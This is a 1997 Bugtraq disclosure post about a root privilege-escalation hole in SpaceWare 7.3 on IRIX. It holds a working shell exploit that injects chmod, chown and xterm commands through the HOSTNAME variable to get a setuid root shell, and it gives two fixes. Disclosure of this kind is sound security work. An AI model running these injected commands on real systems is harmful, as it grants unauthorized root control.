[5172] in bugtraq
SpaceWare 7.3 v1.0
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Mon Aug 25 13:16:34 1997
Date: Wed, 20 Aug 1997 15:53:31 +0200
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Hello
I guess anyone who's reading this already have noticed (if
you are playing with a SpaceBall), anyway here it goes:
===========================================================================
#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
/tmp/sh
===========================================================================
more information:
IRIX 6.2
spaceware 7.3 v1.0 (http://www.spacetec.com/)
ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar
(Obviously, you can use HOSTNAME for any command you want
to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
)
Fix:
a) rm (since spaceball.sh does lots of nasty things, like
running spaceball demos as root, probably this is the best
solution)
b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
$SWDIR/spaceball.sh
--
J.A. Gutierrez
finger me for PGP
